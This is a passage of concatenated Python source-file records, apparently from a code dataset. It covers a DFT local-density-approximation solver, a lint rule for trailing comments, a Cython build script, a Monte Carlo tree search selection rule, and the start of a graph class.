[Entwistle et al. 2018] from finite slab systems and the HEG.\n\n .. 
math ::\n\n E_{\\mathrm{xc}}^{\\mathrm{LDA}}[n] = \\int \\varepsilon_{\\mathrm{xc}}(n) n(x) dx\n\n parameters\n ----------\n pm : object\n Parameters object\n n : array_like\n 1D array of the electron density, indexed as n[space_index]\n separate: bool\n - True: Split the HEG exchange-correlation energy into separate exchange and correlation terms\n - False: Just return the exchange-correlation energy \n\n returns float\n Exchange-correlation energy\n \"\"\"\n NE = pm.lda.NE\n\n # Finite LDAs\n if NE != 'heg':\n p = LDA_parameters.exc_lda[NE]\n e_xc = (p['a'] + p['b']*n + p['c']*n**2 + p['d']*n**3 + p['e']*n**4 + p['f']*n**5)*n**p['g']\n \n # HEG LDA\n else:\n p = LDA_parameters.ex_lda[NE]\n q = LDA_parameters.ec_lda[NE]\n e_x = np.zeros(pm.space.npt, dtype=np.float)\n e_c = np.copy(e_x)\n for j in range(pm.space.npt):\n if(n[j] != 0.0):\n\n # Exchange energy per electron\n e_x[j] = (p['a'] + p['b']*n[j] + p['c']*n[j]**2 + p['d']*n[j]**3 + p['e']*n[j]**4 + p['f']*n[j]**5)*n[j]**p['g']\n\n # Correlation energy per electron\n r_s = 0.5/n[j]\n e_c[j] = -((q['a']*r_s + q['e']*r_s**2)/(1.0 + q['b']*r_s + q['c']*r_s**2 + q['d']*r_s**3))*np.log(1.0 + \\\n q['f']*r_s + q['g']*r_s**2)/q['f']\n\n # Exchange-correlation energy per electron\n e_xc = e_x + e_c\n\n # Exchange-correlation energy\n E_xc = np.dot(e_xc, n)*pm.space.delta\n\n # Separate exchange and correlation contributions\n if separate == True:\n E_x = np.dot(e_x, n)*pm.space.delta\n E_c = np.dot(e_c, n)*pm.space.delta\n return E_xc, E_x, E_c\n else:\n return E_xc\n\n\ndef xc_potential(pm, n, separate=False):\n r\"\"\"LDA approximation for the exchange-correlation potential. Uses the LDAs developed in \n [Entwistle et al. 2018] from finite slab systems and the HEG.\n\n .. math ::\n\n V_{\\mathrm{xc}}^{\\mathrm{LDA}}(x) = \\frac{\\delta E_{\\mathrm{xc}}^{\\mathrm{LDA}}[n]}{\\delta n(x)}\n = \\varepsilon_{\\mathrm{xc}}(n(x)) + n(x)\\frac{d\\varepsilon_{\\mathrm{xc}}}{dn} \\bigg|_{n(x)}\n\n parameters\n ----------\n pm : object\n Parameters object\n n : array_like\n 1D array of the electron density, indexed as n[space_index]\n separate: bool\n - True: Split the HEG exchange-correlation potential into separate exchange and correlation terms\n - False: Just return the exchange-correlation potential \n\n returns array_like\n 1D array of the exchange-correlation potential, indexed as v_xc[space_index]\n \"\"\"\n NE = pm.lda.NE\n\n # Finite LDAs\n if NE != 'heg':\n p = LDA_parameters.vxc_lda[NE]\n v_xc = (p['a'] + p['b']*n + p['c']*n**2 + p['d']*n**3 + p['e']*n**4 + p['f']*n**5)*n**p['g']\n\n # HEG LDA\n else:\n p = LDA_parameters.vx_lda[NE]\n q = LDA_parameters.ec_lda[NE]\n v_x = np.zeros(pm.space.npt, dtype=np.float)\n v_c = np.copy(v_x)\n for j in range(pm.space.npt):\n if n[j] != 0.0:\n\n # Exchange potential\n v_x[j] = (p['a'] + p['b']*n[j] + p['c']*n[j]**2 + \\\n p['d']*n[j]**3 + p['e']*n[j]**4 + \\\n p['f']*n[j]**5)*n[j]**p['g']\n\n # Correlation potential\n r_s = 0.5/n[j]\n energy = -((q['a']*r_s + q['e']*r_s**2)/(1.0 + q['b']*r_s + q['c']*r_s**2 + q['d']*r_s**3))*\\\n np.log(1.0 + q['f']*r_s + q['g']*r_s**2)/q['f']\n derivative = ((r_s*(q['a'] + q['e']*r_s)*(q['b'] + r_s*(2.0*q['c'] + 3.0*q['d']*r_s))*np.log(1.0 + \\\n q['f']*r_s + q['g']*(r_s**2)) - (r_s*(q['a'] + q['e']*r_s)*(q['f'] + 2.0*q['g']*r_s)*\\\n (q['b']*r_s + q['c']*(r_s**2) + q['d']*(r_s**3) + 1.0)/(q['f']*r_s + q['g']*(r_s**2) + \\\n 1.0)) - ((q['a'] + 2.0*q['e']*r_s)*(q['b']*r_s + q['c']*(r_s**2) + q['d']*(r_s**3) + 1.0)*\\\n np.log(1.0 + q['f']*r_s + 
q['g']*(r_s**2))))/(q['f']*(q['b']*r_s + q['c']*(r_s**2) + \\\n q['d']*(r_s**3) + 1.0)**2))\n\n v_c[j] = energy - r_s*derivative\n \n # Exchange-correlation potential\n v_xc = v_x + v_c\n\n if separate == True:\n return v_xc, v_x, v_c\n else:\n return v_xc\n\n\ndef DXC(pm, n): \n r\"\"\"Calculates the derivative of the exchange-correlation potential, necessary for the RPA \n preconditioner.\n\n parameters\n ----------\n pm : object\n Parameters object\n n : array_like\n 1D array of the electron density, indexed as n[space_index]\n\n returns array_like\n 1D array of the derivative of the exchange-correlation potential, indexed as D_xc[space_index]\n \"\"\"\n NE = pm.lda.NE\n\n # Currently only the finite LDAs can be used\n if NE != 'heg':\n p = LDA_parameters.dlda[NE]\n D_xc = (p['a'] + n*(p['b'] + n*(p['c'] + n*(p['d'] + n*(p['e'] + n*p['f'])))))*(n**p['g'])\n else: \n raise IOError(\"Currently the HEG LDA is not implemented for the RPA preconditioner.\")\n\n return D_xc \n\n\ndef total_energy_eigv(pm, eigenvalues, orbitals=None, density=None, v_h=None, v_xc=None):\n r\"\"\"Calculates the total energy from the Kohn-Sham eigenvalues.\n\n .. math ::\n\n E[n] = \\sum_{j=1}^{N} \\varepsilon_j + E_{xc}[n] - E_H[n] - \\int n(x) V_{xc}(x)dx\n\n parameters\n ----------\n pm : object\n Parameters object\n eigenvalues : array_like\n 1D array of the Kohn-Sham eigenvalues, indexed as eigenvalues[orbital_number]\n orbitals : array_like\n 2D array of the Kohn-Sham orbitals, index as orbitals[space_index,orbital_number]\n density : array_like\n 1D array of the electron density, indexed as density[space_index]\n v_h : array_like\n 1D array of the Hartree potential, indexed as v_h[space_index]\n v_xc : array_like\n 1D array of the exchange-correlation potential, indexed as v_xc[space_index]\n\n returns float\n Total energy\n \"\"\"\n # Quantities needed to calculate the total energy\n if density is None:\n if orbitals is None:\n raise ValueError(\"Need to specify either density or orbitals\")\n else:\n density = electron_density(pm, orbitals)\n if v_h is None:\n v_h = hartree_potential(pm, density)\n if v_xc is None:\n v_xc = xc_potential(pm, density)\n\n # Kohn-Sham eigenvalues\n E = 0.0\n for j in range(pm.sys.NE):\n E += eigenvalues[j]\n\n # Hartree Energy\n E -= hartree_energy(pm, v_h, density)\n\n # Exchange-correlation potential term\n E -= np.dot(density, v_xc)*pm.space.delta\n \n # Exchange-correlation energy\n E += xc_energy(pm, density)\n\n return E.real\n\n\ndef total_energy_eigf(pm, orbitals, density=None, v_h=None):\n r\"\"\"Calculates the total energy from the Kohn-Sham orbitals.\n\n .. 
math ::\n\n E[n] = \\sum_{j=1}^{N} \\langle \\phi_{j} | K | \\phi_{j} \\rangle + E_H[n] + E_{xc}[n] \n + \\int n(x) V_{\\mathrm{ext}}(x)dx\n\n parameters\n ----------\n pm : object\n Parameters object\n orbitals : array_like\n 2D array of the Kohn-Sham orbitals, index as orbitals[space_index,orbital_number]\n density : array_like\n 1D array of the electron density, indexed as density[space_index]\n v_h : array_like\n 1D array of the Hartree potential, indexed as v_h[space_index]\n\n returns float\n Total energy\n \"\"\"\n # Quantities needed to calculate the total energy\n if density is None:\n density = electron_density(pm, orbitals)\n if v_h is None:\n v_h = hartree_potential(pm, density)\n\n # Kinetic energy\n E = 0.0\n E += kinetic_energy(pm, orbitals)\n\n # Hartree energy\n E += hartree_energy(pm, v_h, density)\n\n # Exchange-correlation energy\n E += xc_energy(pm, density)\n\n # External potential term\n E += np.dot(pm.space.v_ext, density)*pm.space.delta\n\n return E.real\n\n\ndef kinetic_energy(pm, orbitals):\n r\"\"\"Calculates the kinetic energy from the Kohn-Sham orbitals.\n\n .. math ::\n\n T_{s}[n] = \\sum_{j=1}^{N} \\langle \\phi_{j} | K | \\phi_{j} \\rangle\n\n parameters\n ----------\n pm : object\n Parameters object\n orbitals : array_like\n 2D array of the Kohn-Sham orbitals, index as orbitals[space_index,orbital_number]\n\n \"\"\"\n # Kinetic energy matrix\n sd = pm.space.second_derivative\n sd_ind = pm.space.second_derivative_indices\n K = -0.5*sps.diags(sd, sd_ind, shape=(pm.space.npt, pm.space.npt), dtype=np.float, format='csr')\n\n # Kinetic energy of each occupied orbital\n occ = orbitals[:,:pm.sys.NE]\n eigenvalues = (occ.conj() * K.dot(occ)).sum(0)*pm.space.delta\n\n return np.sum(eigenvalues)\n\n\ndef calculate_current_density(pm, density):\n r\"\"\"Calculates the current density from the time-dependent electron density by solving the \n continuity equation.\n\n .. math:: \n\n \\frac{\\partial n}{\\partial t} + \\frac{\\partial j}{\\partial x} = 0\n\n parameters\n ----------\n pm : object\n Parameters object\n density : array_like\n 2D array of the time-dependent density, indexed as density[time_index,space_index]\n\n returns array_like\n 2D array of the current density, indexed as current_density[time_index,space_index]\n \"\"\"\n pm.sprint('', 1)\n string = 'LDA: calculating current density'\n pm.sprint(string, 1)\n current_density = np.zeros((pm.sys.imax,pm.space.npt), dtype=np.float)\n for i in range(1, pm.sys.imax):\n string = 'LDA: t = {:.5f}'.format(i*pm.sys.deltat)\n pm.sprint(string, 1, newline=False)\n J = np.zeros(pm.space.npt, dtype=np.float)\n J = RE_cython.continuity_eqn(pm, density[i,:], density[i-1,:])\n current_density[i,:] = J[:]\n pm.sprint('', 1)\n\n return current_density\n\n\ndef crank_nicolson_step(pm, orbitals, H_full):\n r\"\"\"Solves Crank Nicolson Equation\n\n .. 
math::\n\n \\left(I + i\\frac{dt}{2} H\\right) \\Psi(x,t+dt) = \\left(I - i \\frac{dt}{2} H\\right) \\Psi(x,t)\n\n parameters\n ----------\n pm : object\n Parameters object\n orbitals : array_like\n 2D array of the Kohn-Sham orbitals, index as orbitals[space_index,orbital_number]\n H_full : array_like\n 2D array of the Hamiltonian matrix in full form, indexed as H_full[space_index,space_index]\n\n returns\n \"\"\"\n # Construct matrices\n dH = 0.5j*pm.sys.deltat*H_full\n identity = np.identity(pm.space.npt, dtype=np.cfloat)\n A = identity + dH\n Abar = identity - dH\n \n # Solve for all single-particle states at once\n RHS = np.dot(Abar, orbitals[:, :pm.sys.NE])\n orbitals_new = spla.solve(A, RHS)\n\n return orbitals_new\n\n\ndef main(parameters):\n r\"\"\"Performs LDA calculation\n\n parameters\n ----------\n parameters : object\n Parameters object\n\n returns object\n Results object\n \"\"\"\n # Array initialisations \n pm = parameters\n string = 'LDA: constructing arrays'\n pm.sprint(string, 1) \n pm.setup_space()\n\n # Take external potential as the initial guess to the Kohn-Sham potential\n H = hamiltonian(pm, v_ks=pm.space.v_ext)\n n_inp, orbitals, eigenvalues = groundstate(pm, H)\n E = total_energy_eigv(pm, eigenvalues=eigenvalues, density=n_inp)\n\n # Need n_inp and n_out to start mixing\n H = hamiltonian(pm, v_ks=ks_potential(pm, n_inp))\n n_out, orbitals_out, eigenvalues_out = groundstate(pm, H)\n\n # Mixing scheme\n if pm.lda.scf_type == 'pulay':\n mixer = mix.PulayMixer(pm, order=pm.lda.pulay_order, preconditioner=pm.lda.pulay_preconditioner)\n elif pm.lda.scf_type == 'cg':\n minimizer = minimize.CGMinimizer(pm, total_energy_eigf)\n elif pm.lda.scf_type == 'mixh':\n minimizer = minimize.DiagMinimizer(pm, total_energy_eigf)\n H_mix = copy.copy(H)\n\n # Find the self-consistent solution\n iteration = 1\n converged = False\n while (not converged) and iteration <= pm.lda.max_iter:\n E_old = E\n\n # Conjugate-gradient minimization starts with orbitals, H[orbitals]\n if pm.lda.scf_type == 'cg':\n\n orbitals = minimizer.step(orbitals, banded_to_full(pm, H))\n n_inp = electron_density(pm, orbitals)\n\n # Calculate total energy at n_inp\n E = total_energy_eigf(pm, orbitals=orbitals, density=n_inp)\n\n # Minimization that mixes Hamiltonian directly starts with n_inp, H[n_inp]\n elif pm.lda.scf_type == 'mixh':\n\n n_tmp, orbitals_tmp, eigenvalues_tmp = groundstate(pm,H_mix)\n H_tmp = hamiltonian(pm, v_ks=ks_potential(pm, n_tmp))\n\n H_mix = minimizer.h_step(H_mix, H_tmp)\n n_inp, orbitals_inp, eigenvalues_inp = groundstate(pm,H_mix)\n\n # Calculate total energy at n_inp\n E = total_energy_eigv(pm, eigenvalues=eigenvalues_inp, density=n_inp)\n\n # Mixing schemes starting with n_inp, n_out (Pulay, linear or none)\n else:\n\n # Calculate new n_inp\n if pm.lda.scf_type == 'pulay':\n n_inp = mixer.mix(n_inp, n_out, eigenvalues_out, orbitals_out.T)\n elif pm.lda.scf_type == 'linear':\n n_inp = (1-pm.lda.mix)*n_inp + pm.lda.mix*n_out\n else:\n n_inp = n_out\n\n # Calculate total energy at n_inp\n E = total_energy_eigv(pm, eigenvalues=eigenvalues_out, density=n_inp)\n\n # Calculate new Kohn-Sham potential and update the Hamiltonian\n v_ks = ks_potential(pm, n_inp)\n H = hamiltonian(pm, v_ks=v_ks)\n\n # Calculate new n_out\n n_out, orbitals_out, eigenvalues_out = groundstate(pm,H)\n\n # Calculate the Kohn-Sham gap\n gap = eigenvalues_out[pm.sys.NE]- eigenvalues_out[pm.sys.NE-1]\n if gap < 1e-3:\n string = \"\\nLDA: Warning: small KS gap {:.3e} Ha. 
Convergence may be slow.\".format(gap)\n pm.sprint(string, 1)\n\n # Calculate the self-consistent density and energy error\n dn = np.sum(np.abs(n_inp-n_out))*pm.space.delta\n dE = E - E_old\n\n # Check if converged\n converged = dn < pm.lda.tol and np.abs(dE) < pm.lda.etol\n string = 'LDA: E = {:.8f} Ha, de = {:+.3e}, dn = {:.3e}, iter = {}'.format(E, dE, dn, iteration)\n pm.sprint(string, 1, newline=False)\n\n # Iterate\n iteration += 1\n\n iteration -= 1\n pm.sprint('')\n\n # Print to screen\n if not converged:\n string = 'LDA: Warning: convergence not reached in {} iterations. Terminating.'.format(iteration)\n pm.sprint(string, 1)\n else:\n pm.sprint('LDA: reached convergence in {} iterations.'.format(iteration),0)\n\n # Self-consistent solution\n density = n_out\n orbitals = orbitals_out\n eigenvalues = eigenvalues_out\n \n # Calculate potentials and energies\n if pm.lda.NE == 'heg':\n E_xc, E_x, E_c = xc_energy(pm, density, separate=True)\n v_xc, v_x, v_c = xc_potential(pm, density, separate=True)\n else:\n E_xc = xc_energy(pm, density)\n v_xc = xc_potential(pm, density)\n v_h = hartree_potential(pm, density)\n v_ks = pm.space.v_ext + v_h + v_xc\n E = total_energy_eigf(pm, orbitals=orbitals, density=density)\n E_h = hartree_energy(pm, v_h, density)\n E_hxc = E_h + E_xc\n\n # Print to screen\n pm.sprint('LDA: ground-state energy: {}'.format(E),1)\n pm.sprint('LDA: ground-state Hartree exchange-correlation energy: {}'.format(E_hxc),1)\n pm.sprint('LDA: ground-state Hartree energy: {}'.format(E_h),1)\n pm.sprint('LDA: ground-state exchange-correlation energy: {}'.format(E_xc),1)\n if pm.lda.NE == 'heg':\n pm.sprint('LDA: ground-state exchange energy: {}'.format(E_x),1)\n pm.sprint('LDA: ground-state correlation energy: {}'.format(E_c),1)\n\n # Save the quantities to file\n results = rs.Results()\n results.add(density, 'gs_lda{}_den'.format(pm.lda.NE))\n results.add(v_h, 'gs_lda{}_vh'.format(pm.lda.NE))\n results.add(v_xc, 'gs_lda{}_vxc'.format(pm.lda.NE))\n results.add(v_ks, 'gs_lda{}_vks'.format(pm.lda.NE))\n results.add(E, 'gs_lda{}_E'.format(pm.lda.NE))\n results.add(E_xc, 'gs_lda{}_Exc'.format(pm.lda.NE))\n results.add(E_h, 'gs_lda{}_Eh'.format(pm.lda.NE))\n results.add(E_hxc, 'gs_lda{}_Ehxc'.format(pm.lda.NE))\n if pm.lda.NE == 'heg' :\n results.add(E_x, 'gs_lda{}_Ex'.format(pm.lda.NE))\n results.add(E_c, 'gs_lda{}_Ec'.format(pm.lda.NE))\n results.add(v_x, 'gs_lda{}_vx'.format(pm.lda.NE))\n results.add(v_c, 'gs_lda{}_vc'.format(pm.lda.NE))\n results.add(orbitals.T,'gs_lda{}_eigf'.format(pm.lda.NE))\n results.add(eigenvalues,'gs_lda{}_eigv'.format(pm.lda.NE))\n if pm.run.save:\n results.save(pm)\n\n # Propagate through real time\n if pm.run.time_dependence:\n\n # Construct arrays\n v_ks_td = np.zeros((pm.sys.imax,pm.space.npt), dtype=np.float)\n v_xc_td = np.zeros((pm.sys.imax,pm.space.npt), dtype=np.float)\n v_h_td = np.zeros((pm.sys.imax,pm.space.npt), dtype=np.float)\n current = np.zeros((pm.sys.imax,pm.space.npt), dtype=np.float)\n density_td = np.zeros((pm.sys.imax,pm.space.npt), dtype=np.float)\n orbitals = orbitals.astype(np.cfloat)\n\n # Save the ground-state\n v_ks_td[0,:] = v_ks[:]\n v_h_td[0,:] = v_h[:]\n v_xc_td[0,:] = v_xc[:]\n density_td[0,:] = density[:]\n\n # Perform real time iterations\n for i in range(1, pm.sys.imax):\n\n # Print to screen \n string = 'LDA: evolving through real time: t = {}'.format(i*pm.sys.deltat)\n pm.sprint(string, 1, newline=False)\n\n # Construct the Hamiltonian\n H = hamiltonian(pm, orbitals=orbitals, perturbation=True)\n H_full = 
banded_to_full(pm, H)\n\n # Propagate through time-step using the Crank-Nicolson method \n orbitals[:, :pm.sys.NE] = crank_nicolson_step(pm, orbitals, H_full)\n density_td[i,:] = electron_density(pm, orbitals)\n v_ks_td[i,:] = pm.space.v_ext[:] + pm.space.v_pert[:] + hartree_potential(pm, density_td[i,:]) + xc_potential(pm, density_td[i,:])\n\n # Hartree and exchange-correlation potential\n v_h_td[i,:] = hartree_potential(pm, density_td[i,:])\n v_xc_td[i,:] = xc_potential(pm, density_td[i,:])\n\n # Calculate the current density\n current_density = calculate_current_density(pm, density_td)\n \n # Save the quantities to file\n results.add(v_ks_td, 'td_lda{}_vks'.format(pm.lda.NE))\n results.add(v_h_td, 'td_lda{}_vh'.format(pm.lda.NE))\n results.add(v_xc_td, 'td_lda{}_vxc'.format(pm.lda.NE))\n results.add(density_td, 'td_lda{}_den'.format(pm.lda.NE))\n results.add(current_density, 'td_lda{}_cur'.format(pm.lda.NE))\n if pm.run.save:\n results.save(pm)\n\n pm.sprint('',1)\n\n return results\n","sub_path":"iDEA/LDA.py","file_name":"LDA.py","file_ext":"py","file_size_in_byte":27181,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
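Two notes on the module above. First, `np.float` and `np.cfloat` are deprecated aliases (removed in NumPy 2.0); plain `float` and `complex` are the modern spellings. Second, the banded ground-state solve can be sanity-checked in isolation: in atomic units, a 1D harmonic oscillator V(x) = x²/2 discretised with the three-point stencil should give a lowest eigenvalue near 0.5. A standalone sketch of that check, with illustrative grid parameters:

```python
import numpy as np
import scipy.linalg as spla

npt, dx = 2001, 0.01
x = (np.arange(npt) - npt // 2) * dx

# Band form matching the module's convention: row 0 is the diagonal,
# row 1 the sub-diagonal of -0.5 * d^2/dx^2 under the three-point stencil.
H = np.zeros((2, npt))
H[0] = 1.0 / dx**2 + 0.5 * x**2
H[1] = -0.5 / dx**2

eigv = spla.eig_banded(H, lower=True, eigvals_only=True)
print(eigv[0])  # ~0.5 on a fine enough grid
```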
+{"seq_id":"621025292","text":"from oelint_adv.cls_rule import Rule\n\n\nclass NoCommentsTrailing(Rule):\n    def __init__(self):\n        super().__init__(id=\"oelint.comments.notrailing\",\n                         severity=\"error\",\n                         message=\"Comments shall be put on separate lines\")\n\n    def check(self, _file, stash):\n        res = []\n        items = stash.GetItemsFor(filename=_file)\n        for i in items:\n            if i.Raw:\n                for line in i.Raw.split(\"\\n\"):\n                    line = line.strip()\n                    if \"#\" in line and line.find(\"#\") > 0:\n                        res += self.finding(i.Origin, i.InFileLine)\n        return res\n","sub_path":"oelint_adv/rule_base/rule_comment_notraling.py","file_name":"rule_comment_notraling.py","file_ext":"py","file_size_in_byte":654,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
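The check above is purely positional: any `#` that is not the first character of the stripped line counts as trailing. Rerunning that predicate standalone shows it also fires on `#` inside quoted values, a known limitation of line-based lint checks (illustrative snippet, not part of the rule):

```python
def has_trailing_comment(line):
    line = line.strip()
    return "#" in line and line.find("#") > 0

print(has_trailing_comment("# standalone comment"))       # False
print(has_trailing_comment('VAR = "1"  # trailing'))      # True
print(has_trailing_comment('URI = "http://x#fragment"'))  # True (false positive)
```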
+{"seq_id":"281643395","text":"import numpy as np\nfrom distutils.core import setup\nfrom distutils.extension import Extension\nfrom Cython.Distutils import build_ext\n# from Cython.Build import cythonize\n\next_modules = [Extension(\n name=\"js_sc\",\n sources=[\"js_sc.pyx\", \"c_js_sc.cpp\"],\n # extra_objects=[\"fc.o\"], # if you compile fc.cpp separately\n include_dirs = [np.get_include()], # .../site-packages/numpy/core/include\n language=\"c++\",\n # libraries=\n # extra_compile_args = \"...\".split(),\n # extra_link_args = \"...\".split()\n )]\n\nsetup(\n name = 'js_sc',\n cmdclass = {'build_ext': build_ext},\n ext_modules = ext_modules,\n)\n\n","sub_path":"js_sc-setup.py","file_name":"js_sc-setup.py","file_ext":"py","file_size_in_byte":645,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
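The commented-out `cythonize` import in the setup script above hints at the shorter modern form of the same build, which drops the explicit `build_ext` cmdclass; a sketch of that variant, keeping the extension definition from the file (typically built with `python setup.py build_ext --inplace`):

```python
import numpy as np
from distutils.core import setup
from distutils.extension import Extension
from Cython.Build import cythonize

ext_modules = [Extension(
    name="js_sc",
    sources=["js_sc.pyx", "c_js_sc.cpp"],
    include_dirs=[np.get_include()],  # .../site-packages/numpy/core/include
    language="c++",
)]

setup(name="js_sc", ext_modules=cythonize(ext_modules))
```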
+{"seq_id":"72687380","text":"from math import exp, sqrt, log, fabs\nfrom random import random, choice, seed, shuffle\n\n#from ParameterObject import depthscale\n# depthlimit originally came from ParameterObject.depthscale (len(depthscale)+500000);\n# a fallback constant keeps UCT_Unique_Score from raising NameError while that import is disabled.\ndepthlimit = 500000\n#========================================================\ndef UBEnergy(nodelist, exploreconstant, verbose):\n    #Compute the average uniqueness factor\n    uniqscore = [1.0 for x in nodelist]\n    for i, node in enumerate(nodelist):\n        visits = node.getvisits()\n        score = node.getuniquenessdata(nodelist)\n        uniqscore[i] = sqrt(visits/score)\n#    uniqscore[0] = 0.0\n\n#    maxval = max(uniqscore)\n#    try:\n#        uniqscore = [1.5*x/maxval for x in uniqscore]\n#    except ZeroDivisionError:\n#        uniqscore = [0.0 for node in nodelist]\n    keylist = {}\n    for i, node in enumerate(nodelist):\n        keylist[str(node)] = uniqscore[i]\n\n    selection = sorted(nodelist, key=lambda x:x.getid())\n    selection = sorted(selection, key=lambda x:UCT_Unique_Score(x, keylist[str(x)], exploreconstant, doprint=True))[-1]\n    print(\"Selecting Node %s with Score: %s\"%(selection.getid(), UCT_Unique_Score(selection, keylist[str(selection)], exploreconstant, doprint=True) ))\n    return selection\n#==========================================================\n\ndef UCT_Unique_Score(node, uniqval, exploreconstant, doprint=False):\n\n    parent = node.getparent()\n    energy = node.getscore()\n    visits = node.getvisits()\n#    nChildren = len(node.getchildren())\n    if parent is None:\n#        return -1e30\n        parenergy = node.getscore()\n        parvisits = visits\n    else:\n        parenergy = parent.getscore()\n        parvisits = parent.getvisits()\n\n\n    depth = node.getdepth()\n#    _, playoutEList = node.getplayouts()\n    _, playoutEList = node.getallplayouts()\n#    usedlist = node.getusedlist()\n#    playoutEList = node.getenergylist()\n    childeng = [child.getscore() for child in node.getnodelist()]\n    nodeEnergy = node.getscore()\n    nodeweight = nodeEnergy\n#    scalefunc = lambda x: log(x, 10.0)\n#    scalefunc = lambda x: sqrt(x)\n    scalefunc = lambda x: x\n    if visits < 10:\n        exploitweight = scalefunc(nodeweight)\n    else:\n        exploitweight = 1e300\n        cnt = 1\n#        if len(childeng) > 0:\n#            for energy in childeng:\n#                exploitweight = min(exploitweight, scalefunc(energy))\n#                exploitweight += energy\n#                cnt += 1\n        if len(playoutEList) > 0:\n            for i, energy in enumerate(playoutEList):\n                exploitweight = min(exploitweight, scalefunc(energy))\n#                exploitweight += energy\n#                cnt += 1\n        exploitweight = exploitweight/cnt\n    explore = 0.0\n    try:\n        explore = uniqval*sqrt(log(parvisits)/visits)\n    except (ValueError, ZeroDivisionError):\n        explore = uniqval\n\n    score = -exploitweight + exploreconstant*explore\n    if parent is not None:\n        node.setexploitvalue(-exploitweight)\n        node.setexplorevalue(explore)\n    if depth > depthlimit or (parent is None):\n        if doprint:\n            try:\n                print(\"Node %s (Parent:%s, Depth %s, Visits:%s): Exploit: %s Score:%s\"%(node.getid(), parent.getid(), depth, visits, -exploitweight, -1e20))\n            except:\n                print(\"Node %s (Parent:Head, Depth %s, Visits:%s): Exploit: %s Score:%s\"%(node.getid(), depth, visits, -exploitweight, -1e20))\n        return -1e20\n\n\n    if doprint:\n        if parent is None:\n            print(\"Node %s (Parent:%s, Depth:%s, Visits:%s): Exploit:%s Explore:%s Score:%s\"%(node.getid(), 'Head', depth, visits, -exploitweight, exploreconstant*explore, score))\n        else:\n            print(\"Node %s (Parent:%s, Depth:%s, Visits:%s): Exploit:%s Explore:%s Unique:%s Score:%s\"%(node.getid(), parent.getid(), depth, visits, -exploitweight, exploreconstant*explore, uniqval, score))\n    return 
score\n\n\n\n#========================================================\n\n","sub_path":"SelectionRule.py","file_name":"SelectionRule.py","file_ext":"py","file_size_in_byte":3903,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
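For contrast with the uniqueness-weighted score above: `UCT_Unique_Score` is a variant of the standard UCB1 selection rule, `exploit + c * sqrt(ln(parent_visits) / visits)`, with the uniqueness factor scaling the exploration term and energies negated because lower energy is better. The textbook form, for reference (standard MCTS/UCB1 formulation, not code from the file):

```python
from math import log, sqrt

def ucb1(exploit, visits, parent_visits, c):
    if visits == 0:
        return float('inf')  # always try unvisited children first
    return exploit + c * sqrt(log(parent_visits) / visits)
```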
+{"seq_id":"346762563","text":"#!/usr/bin/env python\n# -*- encoding: utf-8 -*-\n\nfrom typing import Optional, Dict, Tuple, Union, Set\nfrom copy import deepcopy\nfrom math import pow, sqrt\nimport time\nfrom threading import Lock\nimport networkx as nx\n\n\n# alias types\n#\nNodeType = str\n\"\"\" the type of a node \"\"\"\n\nNodeUid = str\n\"\"\" a node's unique identifier within the context of the node's type \"\"\"\n\nNodeId = Tuple[NodeType, NodeUid]\n\"\"\" the unique identifier of a node - the concatenation of its type and uid\"\"\"\n\nNodeKey = str\n\"\"\" json compliant unique identifier of a node used in hashes \"\"\"\n\nSourceId = NodeId\n\"\"\" unique identifier of the source node in a triple \"\"\"\n\nTargetId = NodeId\n\"\"\" unique identifier of the target node in a triple \"\"\"\n\nEdgeType = str\n\"\"\" the type of an edge \"\"\"\n\nEdgeUid = str\n\"\"\" an edge's unique identifier within the context of the edge's type \"\"\"\n\nEdgeExpired = float\n\"\"\" the timestamp when an edge has expired \"\"\"\n\nEdgeId = Tuple[EdgeType, Optional[EdgeUid], Optional[EdgeExpired]]\n\"\"\" the unique identifier of an edge within the context of the edge type - a concatenation of Edge type, uid, expired timestamp\"\"\"\n\nTripleId = Tuple[SourceId, EdgeId, TargetId]\n\"\"\" the unique identifier of a triple: source node, edge and target node \"\"\"\n\nTripleKey = str\n\"\"\" json compliant unique identifier of a triple used in hashes \"\"\"\n\nPor = dict\n\"\"\" dictionary representing the path of reasoning \"\"\"\n\n\ndef get_node_key(node_id: NodeId) -> NodeKey:\n    # ':' special - enables easy splitting of keys to create ids\n    #\n    return f'{node_id[0]}:{node_id[1]}'\n\n\ndef get_node_id(node_key: NodeKey) -> NodeId:\n    # assumes ':' delimits type and uid\n    #\n    node = node_key.split(':')\n    return node[0], node[1]\n\n\ndef get_triple_key(triple_id: TripleId, directional: bool = False) -> TripleKey:\n    source_key = get_node_key(node_id=triple_id[0])\n    target_key = get_node_key(node_id=triple_id[2])\n\n    # if not directional then key will consist of alphanumeric sort of source_key and target_key\n    # note ':' special - delimits all components and allows for easy splitting to derive equivalent id\n    #\n    if (not directional and source_key < target_key) or directional:\n        triple_key = f'{source_key}:{triple_id[1][0]}:{triple_id[1][1]}:{triple_id[1][2]}:{target_key}'\n    else:\n        triple_key = f'{target_key}:{triple_id[1][0]}:{triple_id[1][1]}:{triple_id[1][2]}:{source_key}'\n    return triple_key\n\n\ndef get_triple_id(triple_key: TripleKey) -> TripleId:\n    # assume special ':' character delimits components\n    #\n    triple = triple_key.split(':')\n\n    # Note have to deal with converting string 'None' to type None\n    #\n    return (triple[0], triple[1]), (triple[2], triple[3] if triple[3] != 'None' else None, float(triple[4]) if triple[4] != 'None' else None), (triple[5], triple[6])\n\n\nclass AMGraph(object):\n    \"\"\"\n    class to represent a sparse graph of nodes connected by edges\n    \"\"\"\n\n    # class attribute representing next unique identifier for an instance of AMGraph\n    # with associated thread lock\n    #\n    _next_uid = None\n    _uid_lock = Lock()\n\n    def __init__(self, uid: Optional[str] = None, graph=None, directional: bool = True, uid_copy: bool = True, normalised: bool = False):\n        \"\"\"\n        AMGraph represents a sparse graph of nodes connected via edges and capable of performing graph comparisons, learning and merging\n        :param uid: optional unique identifier of a graph, if None then autogenerated\n        :param 
